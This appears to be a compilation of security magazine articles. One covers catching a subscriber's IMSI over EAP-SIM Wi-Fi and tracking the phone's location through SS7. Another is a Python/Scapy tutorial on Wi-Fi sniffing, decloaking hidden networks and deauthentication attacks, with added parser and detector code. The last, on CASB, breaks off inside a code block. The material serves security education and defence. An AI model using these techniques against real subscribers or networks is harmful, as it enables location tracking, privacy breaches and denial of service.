Exposing the subscriber's IMSI is critical because it is the main attribute used in mobile networks for many operations, including but not limited to: subscriber authentication, routing of calls, location identification, routing of SMS, routing of data, charging and modification of the subscriber's subscription profile. Thus, exposing a subscriber's IMSI may have a severe impact on the user's privacy, as it could be used in man-in-the-middle attacks, location tracking and fraud. The impact is not limited to the user's privacy but extends to the operators themselves: DDoS attacks could be launched against the operator's infrastructure using other complementary techniques, all of it resulting from the exposure of a single, yet critical, piece of data, the IMSI.

Exploiting the EAP-SIM

This proof of concept was run on one operator's 3G Wi-Fi network. Unlike the well-known GSM IMSI catchers, better known as Stingrays, the methods used to exploit this vulnerability are quite simple: it can be exploited with a Wi-Fi adapter, e.g. the TP-Link 722N, or even the laptop's built-in adapter, if only passive attacks are performed.

The passive attack vector for this vulnerability occurs when an attacker runs a Wi-Fi sniffer, captures the initial exchange and observes the IMSI transported in the initial EAP-Response in the AT_IDENTITY attribute. The IMSI will also be seen if fast re-authentication fails and full authentication occurs once again.

Fig 4 .Wifi IMSI Catcher

As shown in the packet above, this is an EAP Response of type Identity, as shown by the Code field (2) and the Type field (1, Identity) in the EAP layer of the packet. The last attribute in this layer is the identity used by the UE, in this case the IMSI, which takes the following form:
[email protected].
When the IMSI is used as the identifier, the first digit is "1", followed by the country code (MCC: 602, Egypt), followed by the 2-3 digits of the operator code (MNC), followed by the MSIN digits.


What makes this type of attack extremely critical is that normal wireless hacking techniques can easily be adopted; after all, it is pure wireless communication between the UE and the wireless access point, inheriting all of its characteristics. Thus, even if a user is already attached to the SSID, an attacker could send a simple de-authentication packet, forcing the UE to re-authenticate and send its IMSI again.

This attack can be carried out even if the attacker is not in the vicinity of a 3G/4G Wi-Fi SSID, since the attacker can monitor broadcast packets over the air. By default, the UE sends probe requests for the SSIDs stored in the handset's preferred network list, so it is possible to identify such users, set up a rogue access point that accepts the request, and then craft an EAP packet requesting the user's identity, which in this case is the IMSI.

Impact of the attack

Attackers never rely on a single technique or methodology; instead they complement it with all available and relevant techniques. As mentioned earlier, the exposed IMSI can be used for further attacks, such as location tracking, interception, etc. With the emerging new attack vectors against telecom infrastructure and protocols, this can be achieved by exploiting SS7 protocol vulnerabilities.

Location tracking can be achieved by using the IMSI as a parameter to the MAP ProvideSubscriberInfo message, as described below:

Fig 5. Using SS7 to track location via IMSI

Upon sending the ProvideSubscriberInfo request to the operator’s MSC/VLR that is responsible to temporarily store
the location of the user, the response will include, but is not limited to, the following important information:
● Cell ID
● GPS location (if available)
● IMEI (hardware serial number) of handset

With this information, the GPS coordinates and Cell ID can be looked up in an open source Cell ID database such as opencellid.org, revealing the exact location of the target wherever they are. Knowing the IMEI reveals the exact vendor of the handset, giving the attacker the opportunity to customize dedicated malware for that specific vendor.


Mitigation

EAP-SIM includes optional identity privacy (anonymity) support that can be used to hide the clear text permanent
identity and thereby make the subscriber’s EAP exchanges untraceable to eavesdroppers. Because the permanent
identity never changes, revealing it would help observers to track the user.

Identity privacy is based on temporary identities, or pseudonyms, that are created by the EAP server and are equivalent to, but separate from, the Temporary Mobile Subscriber Identities (TMSI) used on cellular networks.

The EAP server transmits pseudonym usernames to the peer in encrypted form, using the AT_ENCR_DATA attribute in the EAP-Request/SIM/Challenge of the first full authentication. If the first full authentication succeeds and the encrypted data includes a pseudonym username, the peer may use the obtained pseudonym username in the next full authentication. The EAP server keeps a mapping between each IMSI and its corresponding pseudonyms. This pseudonym is also recommended for use in fast re-authentication.

As shown in the exploitation section, wireless hacking techniques can be combined with setting up a rogue access point. Operators should address this by enforcing the use of EAP-AKA instead of EAP-SIM. By standard, the AKA authentication mechanism is used for 3G authentication with USIM cards and ensures mutual authentication: unlike EAP-SIM, not only does the network authenticate the subscriber, but the subscriber also authenticates the network itself, by solving a challenge, to make sure it is really their operator.

Securing the user's identity by configuring pseudonyms on the mobile operators' EAP servers, and using the mutual authentication implemented in EAP-AKA, will ensure the privacy of subscribers against these emerging attacks on mobile users.

ABOUT THE AUTHOR

Loay Abdelrazek

Loay Abdelrazek has been in the security field for more than three years. He is a security researcher and enthusiast focusing on the field of telecom security, with the aim of providing better practical solutions to the telecom sector to further enhance the security of their infrastructure, whether at the user equipment layer, access layer, core layer or interconnects of telecom operators. He is also interested in open source security solutions.

PYTHON - PRACTICE AND FUNCTIONALITY

by Omar Ahmed
Python - Practice And Functionality

In the past, there were many programming languages you could use to write your own penetration testing tools, but there was usually one that was the most popular and the first choice when you thought about choosing a programming language for penetration testing tools, such as Perl. Lately, programming languages like Python and Ruby have been widely adopted and have proved their usefulness.

In this article, we will try to shed light on some of the Python advantages and functionality. We will divide the article
into two parts; the first part will discuss the practical use of Python to perform Wi-Fi attacks, the second part will use
Python to perform Exploit Development.

I will try to explain everything in detail. But to be honest, you should be aware of some things so that you do not miss
anything.

WHAT YOU NEED AND SHOULD KNOW:

● Basic Knowledge of 802.11 Protocol.
● Basic Knowledge of Wi-Fi Attacks.
● Basic Knowledge of Buffer Overflow Attacks.
● Python's Network Libraries.

WHAT YOU WILL LEARN:

● Perform Wi-Fi Sniffing With Python.
● Perform Wi-Fi Attacks With Python.
● Perform Exploit Development With Python.

Introduction:
With each passing day, the wireless connectivity community has grown, but this has also ushered in many security issues. With wired connectivity, the attacker needs physical access in order to connect and attack, but in the case of wireless connectivity, an attacker only needs the signal to be available to launch an attack. Before proceeding, you should be aware of the terminology used:

Access Point (AP): It is a networking hardware device that allows a Wi-Fi compliant device to connect to a wired
network.

Service Set Identifier (SSID): It is a sequence of 0–32 alphanumeric characters. It is used as an identifier for a
wireless LAN, and is intended to be unique for a particular area. Since this identifier must often be entered into
devices manually by a human user, it is often a human-readable string and thus commonly called the "Network
Name".

Basic Service Set Identification (BSSID): It is the MAC address of the wireless AP.

Channel number: This represents the range of the radio frequency used by AP for transmission.


Note: The channel number might change due to the AP's automatic channel setting. So, don't get confused if you see the channel number changing.

802.11: Provides bandwidth up to 1-2 Mbps in the 2.4 GHz frequency band. The components of 802.11 are the Media Access Control (MAC) layer and the Physical Layer (PHY). The MAC layer is a sublayer of the Data Link Layer.

Frame: It is the Protocol Data Unit (PDU) of the Data Link Layer.

There are three main types of 802.11 Frames:

• Data Frame
• Control Frame
• Management Frame

These Frames are supported by The MAC Layer. The following figure represents the format of the MAC Layer:

(Figure 01). MAC Format

As you can see in the previous figure, there are three Addresses:

● Address 1: It's the MAC Address of the Client.
● Address 2: It's the MAC Address of the AP.
● Address 3: It's the MAC Address of the Source of Transmission.

In this article, we will focus on the "Management Frame". Now, let's see the transmitted frame between the Client and
AP:

(Figure 02). Transmitted Frames

In the previous figure, we can see the exchange of frames. Let's take a look at the subtypes of management frame:

Beacon: The AP (Access Point) periodically sends a beacon frame to announce its presence and relay information,
such as timestamp, SSID, etc.

Probe Request: The wireless device (client) sends out a probe request to determine which access points are within
range.

Probe Response: In the response of the probe request, a station (AP) responds with a probe response frame,
containing capability information, supported data rates, etc.

Authentication Request: The client sends an authentication request frame containing its identity.

Authentication Response: The AP responds with either acceptance or rejection of the identity of the client.

Association Request: After successful authentication, the client sends an association request that contains its
characteristics, such as supported data rates and the SSID of the AP.

Association Response: AP sends an association response that contains acceptance or rejection. In the case of
acceptance, the AP will create an association ID for the client.

Reassociation Request: If a client roams away from the currently associated access point and finds another access
point having a stronger beacon signal, the radio NIC will send a reassociation frame to the new access point.

Reassociation Response: An access point sends a reassociation response frame containing an acceptance or
rejection notice to the radio NIC requesting reassociation.

Disassociation: A station sends a disassociation frame to another station if it wishes to terminate the association.

Deauthentication: A station sends a deauthentication frame to another station if it wishes to terminate secure
communications.

Now, it's time for the practical part. In the following part, we will discuss how to perform wireless attacks with Python.

We will use Kali as our OS to work with these attacks. If you are using Kali as your host on your physical computer or
laptop, you will have no problem performing these attacks. But, if you are using Kali as a Virtual Machine, you have to
get yourself a USB Wireless Adapter, because the Virtual Machine doesn't use the actual hardware of the Wireless
Adapter. You can't control the Wireless Adapter from the Virtual Machine.

Before performing any of these attacks, you need to enable monitor mode on your wireless interface with these
commands:

(Figure 03). Listing Interfaces

As you can see in the previous figure, we only have one wireless interface corresponding to "wlan0". Let's start by
enabling monitor mode on this interface:


(Figure 04). Switching to Monitor Mode

Great. We successfully enabled monitor mode on the interface. We are ready now to write our first program that sniffs
SSID, BSSID and Channel of the AP.

Sniffing Beacon Frames:

(Figure 05). Sniffing Beacon Frames

We use the first line to instruct the system to run the program with the Python interpreter. Then we import the Scapy library, and in the next line we also import the struct library. In the next line, we declare an empty list which will store the MAC Addresses of the APs. Then we define a new function named "info" which takes one argument called "fm". In the next line, we add a condition to look for Dot11 packets only. In line number 8, we add another condition using the number "0" for the type of the packet, which refers to "Management Frame Packets", and the number "8" for the subtype of the packet, which indicates "Beacon Frames". In the next line, we add a third condition to check whether the MAC Address of the Beacon Frame packet is already in the list or not. If the MAC Address doesn't exist in our list, we append it. Then we continue by printing the information we extracted from the packet, which consists of the following:

fm.info: The SSID of the AP.

fm.addr2: The MAC Address (BSSID).

ord(fm[Dot11Elt:3].info): ord is a function that converts a text character into its character code. To understand what Dot11Elt is, you need to know that when stations start talking to each other, they also send a wealth of additional information called Information Elements. Each Information Element has an ID number and each specific element has its own meaning. What we are looking for is the Information Element (Dot11Elt) with ID number "3"; this element is called Direct Spectrum (DSset) and it contains the channel number that the AP uses to communicate. In the last line, we use the built-in sniff function of Scapy, point it at our interface "wlan0", and assign our function "info" to be applied to each packet we sniff.

Here is the result of the script:


(Figure 06). Output of Sniffing Beacon Frames

Note: We are not doing anything bad here, we are capturing the signals that are already on air.

To understand what are we going to do next, you need to know the code of each subtype we are going to look for:

(Figure 7). Subtypes of Management Frames

There are two types of scans when dealing with Wireless APs. First, Passive Scan. In Passive Scanning, the WLAN
station moves to each channel as per channel list and waits for beacon frames. These frames are buffered and are used
to decode and extract information about BSSs.


(Figure 08). Passive Scanning

This passive scanning will save battery power as it does not need to transmit. As shown in the previous figure, the
WLAN client receives beacon frames from three access points and hence it will declare that it has found only three
BSSs.

(Figure 09). Active Scanning

Second, Active Scan. In Active Scanning, stations play an active role. Probe Request frames are used to obtain responses from the network of choice. In Active Scanning, the station finds the network rather than waiting for the network to announce its availability to all stations.

We already know how to look for beacon frames and extract the information we need. Now, we are going to see how to
Sniff Probe Requests to extract information, like clients of the AP (the devices that use the AP to connect to internet).


(Figure 10). Detecting Clients of AP

In line number 6, we make a new list to save the MAC addresses of the clients we find. In the next line, we ask the user to enter the name of the AP, which will be stored in the "ap_name" variable. In line number 9, we define a new function called "probesniff", which takes only one argument called "fm". In the next line, we add a condition looking only for "Probe Request" packets. Then, we make a new variable and assign it the name of the AP. In the next line, we add another condition to check whether the name of the AP is the same as the one the user entered. In line number 13, we add a new condition to check whether the client's MAC Address already exists in the list of clients or not. If it does not exist, we print the name of the AP and the MAC Address of the client we found, and then append the new MAC address to the list of clients we made earlier.

Now, let's see the output of our script:

(Figure 11). Output of Detecting Clients

Next, we will see how to perform active scanning trying to get the APs to respond to us without waiting for APs to send
"Beacon Frames" into the air.

As we mentioned before, in Active Scanning, we send a "Probe Request" Frame Packet to force the AP to respond to us
with "Probe Response" Frame Packet:


(Figure 12). Sending Probe Requests

Let's look at the new things added in the preceding program. In line number 5, we import a new library called "os"; this module provides a portable way of using operating system dependent functionality. In line number 8, we make a new variable to store the broadcast receiver and assign it the value "FF:FF:FF:FF:FF:FF", which addresses the frames to every AP in our range. Then, we assign "RandMAC()" to a new variable, which yields a random MAC address every time we use it. In line number 11, we define a new function called "channel_hopper", which changes the channel we are transmitting on to a random channel between "1 to 15". After that, we make a new function called "ProbeSender". In line number 18, we make a new variable and assign it the structure of the Probe Request frame: first we need a RadioTap layer, then a Dot11 layer, in which we set addr1 (the broadcast receiver) to "FF:FF:FF:FF:FF:FF" which, as I said before, addresses our frame to every AP in our range, addr2 (the source address) to a random MAC, which gives the source address a new MAC Address in every frame we send, and addr3 (the BSSID) also to a random MAC, which gives the BSSID yet another random MAC Address. For the third part of our frame, we add a Probe Request layer. As I said before, every management frame has to contain layers called Information Elements, which we append to our frame as the fourth part. Last, but not least, we change our channel while sending the frame we made.

Then, we will use this code to sniff the responses of the APs:


(Figure 13). Sniffing Probe Responses

There is nothing different about this code, the only difference is that we are looking for Probe Responses.

Now, let's see the output of our code:

(Figure 14). Output of Active Scanning

As you can see in the preceding figure, our code worked as expected. We forced the APs in our range to announce
themselves.

Where have you been?

In an attempt to provide seamless connectivity, your computer and phone often keep a preferred network list, which
contains the names of wireless networks you have successfully connected to in the past. Either when your computer
boots up or after disconnecting from a network, your computer frequently sends 802.11 Probe Requests to search for
each of the network names on that list.

Next, we will write a script that detects Probe Requests. Our script will print the network name if the request contains a new network name.


(Figure 15). Detecting Preferred Networks

In the previous figure, we detect the Probe Requests that are in the air, and then we print the network name along with
the MAC address of the device (Station) that sent it.

Now, let's start up our script to see Probe Request from the computers or phones in our range:

(Figure 16). Revealing Preferred Networks

As you can see in the previous figure, our code worked as expected. We successfully extracted the Network Name, and
the MAC Address of the device it belongs to.

Is there a hidden network in our range?

According to IEEE 802.11 standards, every wireless network must have an identifier that's used by devices to connect
to that network. This is called the Service Set Identifier (SSID), it basically means "Network Name".


As we mentioned earlier, every so often, routers broadcast something called a "Beacon Frame". This is nothing more than a transmission that contains information about the network, including the SSID, and is meant to announce that this network exists. This is how your phone, for example, knows about all of the Wi-Fi networks around you. (Beacon frames are broadcast about once every 100 milliseconds.)

The Theory behind Hidden Networks:

Wireless signals are all the same: they start at a source (your router) and travel out in all directions. There's no way to "aim" a Wi-Fi transmission in a straight line from your router to your computer, and even if you could, you wouldn't be able to stop the signal as soon as it reached its intended recipient; it will keep going.

How do we find the Hidden Networks in our range?

Let's assume that your wireless network is NOT broadcasting its SSID. Nobody knows it exists except you. Does that
mean you are safe and nobody can find out the existence of your Wi-Fi Network? Actually, even if your network stops
broadcasting its SSID, other people can still find it by intercepting your transmissions to the router, and the router's
transmissions to you.

Now, let's write a code to intercept the Hidden Networks transmissions:

(Figure 17). Detecting Hidden Networks

There is only one difference between this code and our previous programs. In this code, we are looking for the "Beacon
Frames" that don't contain any SSID and then we print the MAC Address of that network.

Let's see the output of our code:

(Figure 18). Revealing Hidden Networks

As you can see, there is only one hidden network that I configured earlier.

How do you De-cloak Hidden Networks?

While a Hidden Network leaves the info field blank when transmitting Beacon Frames, it does transmit the name in its Probe Responses. To discover the hidden name, we must wait for a Probe Response whose MAC Address matches the one we discovered while looking for Hidden Networks in the previous figure.

Let's update our previous code to make it also sniff Probe Responses:

(Figure 19). Decloaking Hidden Networks

As you can see in the previous figure, we only updated our code to look for Probe Responses and filter it to compare
the MAC address of the frame with MAC address of the Hidden Network, and then print the Name of the Network as
you can see in the next figure:

(Figure 20). Revealing the Name of Hidden Networks
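The figures show Scapy's field names but not the bytes underneath them. As an added example (my code, not the article's scripts), here is a parser for raw 802.11 management frames that covers the pieces used so far: the 24-byte MAC header with its three addresses, the fixed fields of beacons and probe responses, the information elements (IE 0 is the SSID; IE 3 is the DS Parameter Set carrying the channel, the element Scapy exposes as Dot11Elt ID 3), hidden-network detection (an empty or NUL-filled SSID element) and the decloaking step that matches a probe response to a previously seen hidden BSSID. It goes a little beyond the hidden-network case by also handling probe requests, which have no fixed fields, so the same parser serves the preferred-network section above. The frames are constructed inside the block, not captured; the MAC addresses and network names are made up.

```python
"""Parse raw 802.11 management frames and resolve hidden SSIDs.

Added example, not the article's Scapy scripts. Decodes the 24-byte MAC
header, the fixed fields of beacons / probe responses and the information
elements (IE 0 = SSID, IE 3 = DS Parameter Set = channel). Sample frames
are constructed below, not captured from any network.
"""
import struct

MGMT = 0
SUBTYPE_PROBE_REQ, SUBTYPE_PROBE_RESP, SUBTYPE_BEACON = 4, 5, 8
IE_SSID, IE_DS_PARAMS = 0, 3
# Bytes of fixed fields before the IEs: timestamp (8) + interval (2) + capability (2)
FIXED_LEN = {SUBTYPE_BEACON: 12, SUBTYPE_PROBE_RESP: 12, SUBTYPE_PROBE_REQ: 0}


def mac_str(raw):
    return ":".join("%02x" % b for b in raw)


def parse_mgmt_frame(frame):
    """Return a dict describing a management frame, or None if it is not one
    (or is truncated). Beacons, probe responses and probe requests also get
    'ssid', 'hidden' and 'channel' keys."""
    if len(frame) < 24:
        return None
    fc0 = frame[0]                                  # frame control, byte 0
    ftype, subtype = (fc0 >> 2) & 0x3, (fc0 >> 4) & 0xF
    if ftype != MGMT:
        return None
    info = {"subtype": subtype,
            "addr1": mac_str(frame[4:10]),          # receiver
            "addr2": mac_str(frame[10:16]),         # transmitter
            "addr3": mac_str(frame[16:22])}         # BSSID for these subtypes
    if subtype not in FIXED_LEN:
        return info
    body, pos = frame[24:], FIXED_LEN[subtype]
    if len(body) < pos:
        return None
    if pos:
        info["timestamp"], info["interval_tu"], info["capability"] = \
            struct.unpack_from("<QHH", body, 0)
    info.update(ssid=None, hidden=False, channel=None)
    while pos + 2 <= len(body):                     # IE: id, length, value
        ie_id, ie_len = body[pos], body[pos + 1]
        value = body[pos + 2:pos + 2 + ie_len]
        if len(value) < ie_len:
            break                                   # truncated IE: stop
        if ie_id == IE_SSID:
            if value.strip(b"\x00") == b"":         # empty or NULs: hidden SSID
                info["hidden"], info["ssid"] = True, ""
            else:
                info["ssid"] = value.decode("utf-8", errors="replace")
        elif ie_id == IE_DS_PARAMS and ie_len == 1:
            info["channel"] = value[0]
        pos += 2 + ie_len
    return info


class HiddenSsidTracker:
    """Remember BSSIDs that beacon with an empty SSID and learn the real name
    from a probe response sent by the same BSSID (the decloaking step)."""

    def __init__(self):
        self.hidden = {}        # bssid -> channel
        self.resolved = {}      # bssid -> ssid

    def feed(self, frame):
        info = parse_mgmt_frame(frame)
        if not info or "ssid" not in info:
            return info
        bssid = info["addr3"]
        if info["subtype"] == SUBTYPE_BEACON and info["hidden"]:
            self.hidden[bssid] = info["channel"]
        elif info["subtype"] == SUBTYPE_PROBE_RESP and bssid in self.hidden and info["ssid"]:
            self.resolved[bssid] = info["ssid"]
        return info


def build_sample(subtype, addr1, addr2, addr3, ssid, channel):
    """Constructed test frame: header, fixed fields (if any), SSID, rates, DS IE."""
    def mac(m):
        return bytes.fromhex(m.replace(":", ""))
    fc = bytes([(MGMT << 2) | (subtype << 4), 0x00])
    header = fc + b"\x00\x00" + mac(addr1) + mac(addr2) + mac(addr3) + b"\x00\x00"
    fixed = struct.pack("<QHH", 123456789, 100, 0x0411) if FIXED_LEN[subtype] else b""
    ies = bytes([IE_SSID, len(ssid)]) + ssid + bytes([1, 1, 0x82, IE_DS_PARAMS, 1, channel])
    return header + fixed + ies


BROADCAST, STATION = "ff:ff:ff:ff:ff:ff", "02:de:ad:be:ef:01"
BSSID_OPEN, BSSID_HIDDEN = "02:aa:bb:cc:dd:ee", "02:11:22:33:44:55"
SAMPLE_FRAMES = [
    build_sample(SUBTYPE_BEACON, BROADCAST, BSSID_OPEN, BSSID_OPEN, b"CoffeeShop", 6),
    build_sample(SUBTYPE_BEACON, BROADCAST, BSSID_HIDDEN, BSSID_HIDDEN, b"", 11),
    build_sample(SUBTYPE_PROBE_REQ, BROADCAST, STATION, BROADCAST, b"HomeWifi", 1),
    build_sample(SUBTYPE_PROBE_RESP, STATION, BSSID_HIDDEN, BSSID_HIDDEN, b"BackOffice", 11),
]


def run_demo(frames=SAMPLE_FRAMES):
    """Feed all sample frames through the tracker and return it."""
    tracker = HiddenSsidTracker()
    for frame in frames:
        tracker.feed(frame)
    return tracker
```

Feeding the two beacons leaves one BSSID in tracker.hidden with its channel; the probe response from that same BSSID then fills tracker.resolved with the name, which is precisely the comparison the decloaking script performs with Scapy's addr3 and info fields. The truncation checks matter when you parse what a monitor-mode interface hands you, since malformed or cut frames are common on the air.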

Up to this point, we have seen various sniffing techniques that gather information about the clients and APs around
us. Now, we will see how to perform wireless attacks.

Deauthentication Attack:

It's a type of denial of service attack that targets communication between a user and a Wi-Fi wireless access point.

How Does a Deauthentication Attack work?

The 802.11 (Wi-Fi) protocol contains several different types of frames, some of which we have already seen. We already defined the Deauthentication Frame: it is a subtype of Management Frame, and the client uses it to declare that it wishes to disconnect from the AP. The AP also sends a deauthentication frame in the form of a reply. An attacker can send a wireless access point a deauthentication frame at any time on behalf of the client, using the client's MAC Address, which we have already discussed how to obtain.

It depends on what do you want to do. If you want to deauthenticate the whole AP's Clients you can use this code:


(Figure 21). Deauthenticating the whole AP

On the other side, if you want to target a specific client, you can use this code:

(Figure 22). Deauthenticating Specific Target

It's very easy to understand this code. The frame variable contains the Deauthentication Packet. We used "sendp" to
send our packet, which contains the "count" referring to the total number of packets sent, "inter" which indicates the
interval between the packets we send.

Now, let's see the output of our code:

(Figure 23). Output of Deauthenticating Script

Detecting Deauthentication Attacks:

There is no countermeasure to protect yourself from Deauthentication Attacks, but you can detect them with this code:

(Figure 24). Detecting Deauthentication Attacks


(Figure 25). Output of Detecting Deauthentication Attacks Script
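The detection side deserves a concrete illustration. The following is an added example, not the article's script: a sliding-window counter over decoded management frames that raises one alert when a burst of deauthentication or disassociation frames from the same claimed sender exceeds a threshold. It is keyed on addr2 because a forged deauth carries the AP's (or the client's) MAC there, so the detector tells you which BSSID is being impersonated, not who is transmitting; a broadcast-addressed burst is the stronger signal, since access points rarely deauthenticate everyone at once in normal operation. Where both AP and clients support 802.11w Protected Management Frames, forged deauthentication and disassociation frames fail integrity checking and are discarded, so detection like this matters most on networks that cannot enable it. The records below are constructed and shaped like what a sniffer callback already provides (Scapy's fm.type, fm.subtype, fm.addr1, fm.addr2, fm.addr3 plus a timestamp).

```python
"""Flag deauthentication / disassociation floods in a stream of decoded
802.11 management frames.

Added example, not the article's detection script. It consumes the fields a
sniffer callback already gives you (Scapy's fm.type, fm.subtype, fm.addr1,
fm.addr2, fm.addr3 plus a timestamp); the records below are constructed.
"""
from collections import defaultdict, deque

MGMT = 0
SUBTYPE_DISASSOC, SUBTYPE_DEAUTH = 10, 12
BROADCAST = "ff:ff:ff:ff:ff:ff"


class DeauthDetector:
    """Sliding-window counter keyed on addr2, the (claimed) transmitter.

    A forged deauth carries the AP's or client's MAC in addr2, so the key
    identifies which BSSID is being impersonated, not who really sent it.
    One alert fires when `threshold` frames fall inside `window_s` seconds."""

    def __init__(self, window_s=1.0, threshold=5):
        self.window_s = window_s
        self.threshold = threshold
        self.recent = defaultdict(deque)      # addr2 -> deque of (ts, addr1)
        self.alerts = []

    def observe(self, ts, ftype, subtype, addr1, addr2, addr3):
        """Feed one decoded frame; return an alert dict or None."""
        if ftype != MGMT or subtype not in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
            return None
        window = self.recent[addr2]
        window.append((ts, addr1))
        while window and ts - window[0][0] > self.window_s:
            window.popleft()                  # drop frames older than the window
        if len(window) != self.threshold:     # fire once, as the threshold is reached
            return None
        targets = sorted({a for _, a in window if a != BROADCAST})
        alert = {"ts": ts, "bssid": addr2, "count": len(window),
                 "broadcast": any(a == BROADCAST for _, a in window),
                 "targets": targets}
        self.alerts.append(alert)
        return alert


# Constructed sample stream: (ts, type, subtype, addr1, addr2, addr3).
AP, CLIENT = "02:11:22:33:44:55", "02:de:ad:be:ef:01"
SAMPLE_FRAMES = (
    [(0.0, MGMT, SUBTYPE_DEAUTH, CLIENT, AP, AP)]                                   # one legitimate disconnect
    + [(1.0 + i * 0.1, MGMT, 8, BROADCAST, AP, AP) for i in range(5)]                # beacons, ignored
    + [(10.0 + i * 0.1, MGMT, SUBTYPE_DEAUTH, BROADCAST, AP, AP) for i in range(8)]  # broadcast burst
    + [(20.0 + i * 0.05, MGMT, SUBTYPE_DEAUTH, CLIENT, AP, AP) for i in range(6)]    # burst at one client
)


def run_detector(frames=SAMPLE_FRAMES, window_s=1.0, threshold=5):
    """Run the detector over a frame list and return the alerts raised."""
    detector = DeauthDetector(window_s, threshold)
    for record in frames:
        detector.observe(*record)
    return detector.alerts


if __name__ == "__main__":
    for alert in run_detector():
        print(alert)
```

On the constructed stream the single disconnect at the start stays silent, the broadcast burst produces one alert with an empty target list, and the burst aimed at a single station produces one alert naming that client. Tune window_s and threshold to the environment: a busy enterprise WLAN sees legitimate deauthentications from roaming and idle timeouts, so start conservatively and compare against a baseline before alerting on it.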

Conclusion:

We already talked about Scapy in the previous issue, but still I can't find the limit of this tool (library). I hope I
expanded your knowledge in Python and Scapy in this article and I also hope I meet you in another useful article.

About the Author

Omar Ahmed

Penetration Tester with 5 years of experience in web application and network penetration testing, malware analysis, reverse engineering, security code auditing and incident response. Conducted vulnerability assessments and penetration tests for many high-profile companies all over the Middle East. Highly skilled in hands-on application security assessment and development of security tools, with a deep understanding of the vulnerability management process and risk assessment. Involved in security challenges by joining online CTFs.

https://www.linkedin.com/in/omar-ahmed-843b6b122

https://www.facebook.com/MistSpark

CASB - CLOUD ACCESS SECURITY BROKER

by Samrat Das
CASB - Cloud Access Security Broker

What is CASB?
This article aims to give a concise introduction for those who are interested in learning about the latest trend in cloud broker security.

A Cloud Access Security Broker (CASB) is a set of new cloud security technologies that addresses the challenges posed
by the use of cloud apps and services. They work as tools that sit between an organization's on-premises infrastructure
and a cloud provider's infrastructure.

Playing the role of a gatekeeper, they allow the organization to extend the reach of their security policies beyond their
own infrastructure.

CASBs are classified as:

● On-premises or
● Cloud-hosted software that acts as a control point to support continuous visibility, compliance, threat protection, and security for cloud services.

CASB solutions help to:

● Identify and evaluate all the cloud apps in use
● Enforce cloud application management policies in web proxies or firewalls
● Provide handling of sensitive information
● Encrypt or tokenize sensitive content to enforce privacy and security
● Detect and block unusual account behaviour indicative of malicious activity
● Integrate cloud visibility and controls with broader security solutions for data loss prevention, access management, and web security

Statistics:

● By 2020, 85% of large enterprises will use a cloud access security broker solution for their cloud services, which
is up from fewer than 5% in 2015.
● Through 2020, 95% of cloud security failures will be the customer's fault.
Source: (https://www.skyhighnetworks.com/cloud-security-university/what-is-cloud-access-security-broker/)

How did CASB come to market?

Enterprises are still struggling to understand the data security and compliance impact of aggressive employee and organizational adoption of cloud applications, while also trying to determine how to maintain data security and compliance with new data residency laws as their infrastructure moves to the cloud.

This is where a Cloud Access Security Broker (CASB) comes into play. Where data residency rules mean that sensitive data must never leave the country, a CASB can encrypt or tokenize the data before it reaches the cloud service, with the option for the enterprise to hold its own encryption keys, so that access to the data without the enterprise's knowledge is ruled out.

One drawback is reduced application functionality, because the SaaS servers cannot process data they cannot read (search, sort and reporting in particular). Vendors mitigate this to a large extent with encryption and tokenization schemes that preserve enough of the plaintext's format or ordering for the application to keep working. The practitioner's caveat is that every property preserved in the ciphertext is also information leaked to the provider, so these schemes trade some confidentiality for functionality. This is still a developing technology that will bring better measures in time.

How is CASB presented?

CASB technology is available as a SaaS application, on-premises via virtual or physical appliances, or both, using a hybrid combination of on-premises and cloud-based policy enforcement points.

Observations:

● The wide adoption of identity and access management into the cloud, delivering cloud single sign-on, has
reduced the friction in adopting cloud services and related security controls, like cloud access security brokers
(CASBs).

● Many enterprise business units are acquiring cloud services directly without IT's involvement. This form of
"shadow IT" is fuelling growth in cloud service adoption as well as security risks.

● The CASB market has evolved rapidly since its gestation period in 2012 and includes a number of high-profile
acquisitions.

● Today, CASBs primarily address back-office applications delivered as SaaS.

How Does CASB Work?

A high level understanding:

CASBs work by ensuring that network traffic between on-premises devices and the cloud provider complies with the
organization's security policies.


Image Source: Gartner’s blog: security musings

Fundamental Capabilities of CASB

● Cloud App Discovery and Analysis


Provide Shadow IT discovery and risk analysis including detailed cloud app ratings, usage analytics, and continuous
reporting.

● Data Governance and Protection


Provide the ability to enforce data-centric security policies to prevent unwanted activity such as inappropriate sharing
of content. Support encryption and tokenization of compliance-related data.

● Threat Protection and Incident Response


Prevent malicious activity such as data exfiltration due to account takeover, session hijacking, or insider activity
through continuous monitoring of user behavior. Identify and block malware being uploaded or shared within cloud
apps and provide tools for incident response.

● Compliance and Data Privacy


Assist with data residency and compliance with regulations and standards, as well as identify cloud usage and risks of
specific cloud services.


CASB’s most prominent functionalities

● Visibility

CASBs provide both shadow and sanctioned IT discovery, as well as a consolidated view of an organization's
cloud service usage and the users who access data from any device or location.

● Compliance

CASBs assist with data residency and compliance with regulations and standards, as well as identify cloud usage
and the risks of specific cloud services.

● Data Security

CASBs provide the ability to enforce data-centric security policies to prevent unwanted activity based on data
classification, discovery and user activity monitoring of access to sensitive data or privilege escalation.

● Threat Protection

CASBs prevent unwanted devices, users and versions of applications from accessing cloud services by providing
adaptive access controls. Other examples in this category are user and entity behaviour analytics (UEBA) for
determining anomalous behaviour, the use of threat intelligence, and malware identification.

Comprehensive CASB solutions leverage the following:

● Application Specific Security


The top cloud apps have well-defined APIs that a CASB can leverage to monitor activity, analyse content, and
modify settings within accounts on that cloud app.

● Inline Security with Gateways


Sitting between the users and their cloud apps, a CASB gateway can provide valuable insights into cloud activity
and provide a vehicle for real-time policy enforcement, such as blocking data exfiltration or protecting
information with encryption.

● Shadow IT Analysis
Existing security devices, such as secure web gateways and firewalls, have log data that can be used to help
analyse Shadow IT.

● Access Control
Endpoint agents offer another option to manage cloud activity and enforce policies.
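The log-based discovery mentioned above is easy to prototype. The following is an added example, not code from the article or from any CASB product: it runs the kind of analysis a CASB's log-collection mode performs over a handful of constructed, simplified Squid-style proxy log lines and a constructed service catalogue (a real catalogue is the vendor's registry of thousands of services with risk ratings). The hostnames, users and byte counts are made up for the demonstration. What it shows is the aggregation per service and per user, and the distinction between an unsanctioned service that the proxy already blocks and one that is still reachable, which is the enforcement gap a CASB report is meant to surface.

```python
"""Shadow IT discovery from the logs of an existing web proxy, the way a CASB in
log-collection mode does it.  Added example, not part of the original article;
the service catalogue and the Squid-style log lines are constructed."""
import re
from urllib.parse import urlsplit

# Constructed catalogue: hostname -> (service, sanctioned?, risk score 1-10).
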